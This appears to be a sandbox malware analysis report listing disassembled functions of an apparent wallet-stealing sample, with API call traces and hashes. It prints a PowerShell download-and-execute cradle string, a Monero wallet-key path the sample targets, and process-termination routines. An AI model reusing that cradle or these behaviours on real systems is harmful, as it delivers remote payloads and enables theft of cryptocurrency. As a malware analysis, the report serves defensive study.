Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Close$QueryValue$EnumOpenlstrcpylstrlenwsprintf
String ID: %s\%s
API String ID: 3896182533-4073750446
Opcode ID: 2881ccbd46f2983e935f5e7ca0f6b219d7b00dd641dbbaada166fb416db0abfc
Instruction ID: 5eb2bc821d2d9d154cdca566a9951f522d111860e75d00bca976f3cfa822e74c
Opcode Fuzzy Hash: 2881ccbd46f2983e935f5e7ca0f6b219d7b00dd641dbbaada166fb416db0abfc
Instruction Fuzzy Hash: 8E21E6B1A1421CABDB24DB54DC85FE9B3B8FB48700F10C5D8B609A6180DF71AA85DFA4

Function 00CE99A0 Relevance: 10.6, APIs: 7, Instructions: 60processCOMMON

Download Yara Rule

APIs

CreateToolhelp32Snapshot.KERNEL32(00000002,00000000), ref: 00CE99C5
Process32First.KERNEL32(00CDA056,00000128), ref: 00CE99D9
Process32Next.KERNEL32(00CDA056,00000128), ref: 00CE99F2
OpenProcess.KERNEL32(00000001,00000000,?), ref: 00CE9A4E
TerminateProcess.KERNEL32(00000000,00000000), ref: 00CE9A6C
CloseHandle.KERNEL32(00000000), ref: 00CE9A79
CloseHandle.KERNEL32(00CDA056), ref: 00CE9A88

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: CloseHandleProcessProcess32$CreateFirstNextOpenSnapshotTerminateToolhelp32
String ID:
API String ID: 2696918072-0
Opcode ID: a686d77d4626ef6d9fbd26e5a7248fa3072f130ecfbd6ea624c6bc9164460b34
Instruction ID: efc12df81d4b0bace8029efe8dd7f33287651a0daf60c11cc227bbdd3098d921
Opcode Fuzzy Hash: a686d77d4626ef6d9fbd26e5a7248fa3072f130ecfbd6ea624c6bc9164460b34
Instruction Fuzzy Hash: 3721E7B1904218ABDB21EFA2DC88BEDB7B9FF49300F104198E509A6290D7749B84DF90

Function 00CE7820 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 43registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CE7834
RtlAllocateHeap.NTDLL(00000000), ref: 00CE783B
RegOpenKeyExA.ADVAPI32(80000002,0158B700,00000000,00020119,00000000), ref: 00CE786D
RegQueryValueExA.ADVAPI32(00000000,0159DD10,00000000,00000000,?,000000FF), ref: 00CE788E
RegCloseKey.ADVAPI32(00000000), ref: 00CE7898

Strings

Windows 11, xrefs: 00CE784D

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: Windows 11
API String ID: 3225020163-2517555085
Opcode ID: 7b6eee43e55ab2bd97b3b0737143a8f0d5e366372568da048fbf4e82f4559b3b
Instruction ID: 5feba34bfd3e01454e003c3e147e788f984c0361b30a01d579e09148b24351e1
Opcode Fuzzy Hash: 7b6eee43e55ab2bd97b3b0737143a8f0d5e366372568da048fbf4e82f4559b3b
Instruction Fuzzy Hash: 5F01FFB5A48309BBEB10EBE5DD49F6E77B8EB49700F104194FA05E6291E6709A00EB50

Function 00CE78B0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 42registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CE78C4
RtlAllocateHeap.NTDLL(00000000), ref: 00CE78CB
RegOpenKeyExA.ADVAPI32(80000002,0158B700,00000000,00020119,00CE7849), ref: 00CE78EB
RegQueryValueExA.ADVAPI32(00CE7849,CurrentBuildNumber,00000000,00000000,?,000000FF), ref: 00CE790A
RegCloseKey.ADVAPI32(00CE7849), ref: 00CE7914

Strings

CurrentBuildNumber, xrefs: 00CE7901

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID: CurrentBuildNumber
API String ID: 3225020163-1022791448
Opcode ID: 58ee17bee39ae10b5b52d9c83c329dc7666be95dcd8e9ba739d88d4011b91f1c
Instruction ID: f609e4122e5a0d229bfc36962931914280914e2bf4f310e3e4d04233afbc4a87
Opcode Fuzzy Hash: 58ee17bee39ae10b5b52d9c83c329dc7666be95dcd8e9ba739d88d4011b91f1c
Instruction Fuzzy Hash: 5C01F4F5A4430DBFDB00EBD4DC49FAE77B8EB45700F104595F605A6281D7705A009B91

Function 00CDA110 Relevance: 9.1, APIs: 6, Instructions: 82filememoryCOMMON

Download Yara Rule

APIs

CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00CDA13C
GetFileSizeEx.KERNEL32(000000FF,?), ref: 00CDA161
LocalAlloc.KERNEL32(00000040,?), ref: 00CDA181
ReadFile.KERNEL32(000000FF,?,00000000,00CD148F,00000000), ref: 00CDA1AA
LocalFree.KERNEL32(00CD148F), ref: 00CDA1E0
CloseHandle.KERNEL32(000000FF), ref: 00CDA1EA

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: File$Local$AllocCloseCreateFreeHandleReadSize
String ID:
API String ID: 2311089104-0
Opcode ID: cfd328cb762a12a58d6ee1d89accbd0f42fd3011adbec2e1b728a3607c7ed0d9
Instruction ID: f257acd4525ee13a82335c1e51ca8a8ca2b0f4081259a357ca6d425477909746
Opcode Fuzzy Hash: cfd328cb762a12a58d6ee1d89accbd0f42fd3011adbec2e1b728a3607c7ed0d9
Instruction Fuzzy Hash: 8931D6B4A00209EFDB14DFA4DC85FAEBBB5BB49304F108159E911A7390D774AA81DFA1

Function 00CE49D0 Relevance: 8.9, APIs: 7, Instructions: 101stringCOMMON

Download Yara Rule

APIs

lstrcat.KERNEL32(?,0159DFB0), ref: 00CE4A2B

Part of subcall function 00CE8F70: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00CE8F9B

lstrcat.KERNEL32(?,00000000), ref: 00CE4A51
lstrcat.KERNEL32(?,?), ref: 00CE4A70
lstrcat.KERNEL32(?,?), ref: 00CE4A84
lstrcat.KERNEL32(?,0158B220), ref: 00CE4A97
lstrcat.KERNEL32(?,?), ref: 00CE4AAB
lstrcat.KERNEL32(?,0159D638), ref: 00CE4ABF

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CE8F20: GetFileAttributesA.KERNEL32(00000000,?,00CD1B94,?,?,00CF577C,?,?,00CF0E22), ref: 00CE8F2F

Part of subcall function 00CE47C0: GetProcessHeap.KERNEL32(00000000,0098967F), ref: 00CE47D0
Part of subcall function 00CE47C0: RtlAllocateHeap.NTDLL(00000000), ref: 00CE47D7
Part of subcall function 00CE47C0: wsprintfA.USER32 ref: 00CE47F6
Part of subcall function 00CE47C0: FindFirstFileA.KERNEL32(?,?), ref: 00CE480D

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$FileHeap$AllocateAttributesFindFirstFolderPathProcesslstrcpywsprintf
String ID:
API String ID: 2540262943-0
Opcode ID: 680340f4837412a5883aa3fff44b5af7d2b03c11b336875d2735fc03d9d87e5d
Instruction ID: 286d0c2cc98ea14645d10f23a323e42cd526ba5865114ec1a9a17b5cedee57de
Opcode Fuzzy Hash: 680340f4837412a5883aa3fff44b5af7d2b03c11b336875d2735fc03d9d87e5d
Instruction Fuzzy Hash: 05315DF2A0020CABDB14FBB0DC86EED7378AB49700F404589B60996091EE74A78CDF94

Function 00CE2EE0 Relevance: 8.8, APIs: 1, Strings: 4, Instructions: 99COMMON

Download Yara Rule

APIs

Part of subcall function 00CEAA50: lstrcpy.KERNEL32(00CF0E1A,00000000), ref: 00CEAA98

Part of subcall function 00CEACC0: lstrlen.KERNEL32(?,01598830,?,\Monero\wallet.keys,00CF0E1A), ref: 00CEACD5
Part of subcall function 00CEACC0: lstrcpy.KERNEL32(00000000), ref: 00CEAD14
Part of subcall function 00CEACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00CEAD22

Part of subcall function 00CEAC30: lstrcpy.KERNEL32(00000000,?), ref: 00CEAC82
Part of subcall function 00CEAC30: lstrcat.KERNEL32(00000000), ref: 00CEAC92

Part of subcall function 00CEABB0: lstrcpy.KERNEL32(?,00CF0E1A), ref: 00CEAC15

ShellExecuteEx.SHELL32(0000003C), ref: 00CE2FD5

Strings

<, xrefs: 00CE2F89
-nop -c "iex(New-Object Net.WebClient).DownloadString(', xrefs: 00CE2F14
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe, xrefs: 00CE2F54
')", xrefs: 00CE2F03

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrcat$ExecuteShelllstrlen
String ID: ')"$-nop -c "iex(New-Object Net.WebClient).DownloadString('$<$C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
API String ID: 3031569214-898575020
Opcode ID: 0f4a1c6dc7b46cacfc613a9c5174b63a33af659bf4c4db27d33004facad84261
Instruction ID: 5a381c0e52943b10a8da76a7350b2a0dc2c44c732a4177bd081369ab3c7efe46
Opcode Fuzzy Hash: 0f4a1c6dc7b46cacfc613a9c5174b63a33af659bf4c4db27d33004facad84261
Instruction Fuzzy Hash: E441E871D102889FDB14EBA1CCA2BEDBB79AF10300F514469E11666192EF713A49DF92

Function 00CE4300 Relevance: 7.6, APIs: 5, Instructions: 124registrystringCOMMON

Download Yara Rule

APIs

RegOpenKeyExA.ADVAPI32(80000001,0159D6D8,00000000,00020119,?), ref: 00CE4344
RegQueryValueExA.ADVAPI32(?,0159DE48,00000000,00000000,00000000,000000FF), ref: 00CE4368
RegCloseKey.ADVAPI32(?), ref: 00CE4372
lstrcat.KERNEL32(?,00000000), ref: 00CE4397
lstrcat.KERNEL32(?,0159DE60), ref: 00CE43AB

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: lstrcat$CloseOpenQueryValue
String ID:
API String ID: 690832082-0
Opcode ID: cc2425241400f2db77687c01bf40374eba7d04ea7d27649948dcbc5a87c00705
Instruction ID: 79bb41568775dc44ff93dcfddc148e661c937ca91785227ee361afb8c55845a8
Opcode Fuzzy Hash: cc2425241400f2db77687c01bf40374eba7d04ea7d27649948dcbc5a87c00705
Instruction Fuzzy Hash: 7D4185B690010CABDB14FBE0EC46FEE733CAB89700F044559B71696181FA755B889BE1

Function 00D4CBE2 Relevance: 7.6, APIs: 5, Instructions: 87COMMONLIBRARYCODE

Download Yara Rule

APIs

dllmain_raw.LIBCMT ref: 00D4CC1F
dllmain_crt_dispatch.LIBCMT ref: 00D4CC36
dllmain_raw.LIBCMT ref: 00D4CC7E
dllmain_crt_dispatch.LIBCMT ref: 00D4CC91
dllmain_raw.LIBCMT ref: 00D4CCA4

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: dllmain_raw$dllmain_crt_dispatch
String ID:
API String ID: 3136044242-0
Opcode ID: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction ID: 2cb0b4e8fbf2004a76c48312b6ece127f44e2a479b511ebf9fd8699fab44c832
Opcode Fuzzy Hash: 234a4587e1df5c0bc1ce5882952f099010f88dbe2dfa5d5717c242a90a4fec11
Instruction Fuzzy Hash: 4921A172D62658AFDBB19F56CC8197F3A79EB81B90F096119F80967211D7308D418BF0

Function 00CE7F90 Relevance: 7.6, APIs: 5, Instructions: 58registrymemoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104), ref: 00CE7FC7
RtlAllocateHeap.NTDLL(00000000), ref: 00CE7FCE
RegOpenKeyExA.ADVAPI32(80000002,0158B7E0,00000000,00020119,?), ref: 00CE7FEE
RegQueryValueExA.ADVAPI32(?,0159D578,00000000,00000000,000000FF,000000FF), ref: 00CE800F
RegCloseKey.ADVAPI32(?), ref: 00CE8022

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000121D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000123F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001249000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000001257000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091487386.0000000001258000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091582506.00000000013F3000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091595746.00000000013F4000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_cd0000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateCloseOpenProcessQueryValue
String ID:
API String ID: 3225020163-0
Opcode ID: c768065ea78461bf0ab23b34f082f90c04d2030b3fc6e5f6c264bf329215b829
Instruction ID: f50245770c9079e16e1ebc1247c3fe40122fb22a24ed55a14ee296e3b4a8e7e4
Opcode Fuzzy Hash: c768065ea78461bf0ab23b34f082f90c04d2030b3fc6e5f6c264bf329215b829
Instruction Fuzzy Hash: 1111CEB2A44349EFD700DF85DC89FBFBBB8EB45B10F100119F615A7280D7B458049BA0

Function 00CE93F0 Relevance: 7.5, APIs: 4, Strings: 1, Instructions: 41stringCOMMON

Download Yara Rule

APIs

StrStrA.SHLWAPI(0159DE78,00000000,00000000,?,00CD9F71,00000000,0159DE78,00000000), ref: 00CE93FC
lstrcpyn.KERNEL32(00FA7580,0159DE78,0159DE78,?,00CD9F71,00000000,0159DE78), ref: 00CE9420
lstrlen.KERNEL32(00000000,?,00CD9F71,00000000,0159DE78), ref: 00CE9437
wsprintfA.USER32 ref: 00CE9457

Strings

%s%s, xrefs: 00CE9445

Memory Dump Source

Source File: 00000000.00000002.2091020905.0000000000CD1000.00000040.00000001.01000000.00000003.sdmp, Offset: 00CD0000, based on PE: true

Associated: 00000000.00000002.2091008439.0000000000CD0000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000CFC000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E0D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E19000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000E3E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091020905.0000000000FA6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.0000000000FBA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2091277826.000000000113E000.00000040.00000001.01000000.00000003.sdmpDownload File
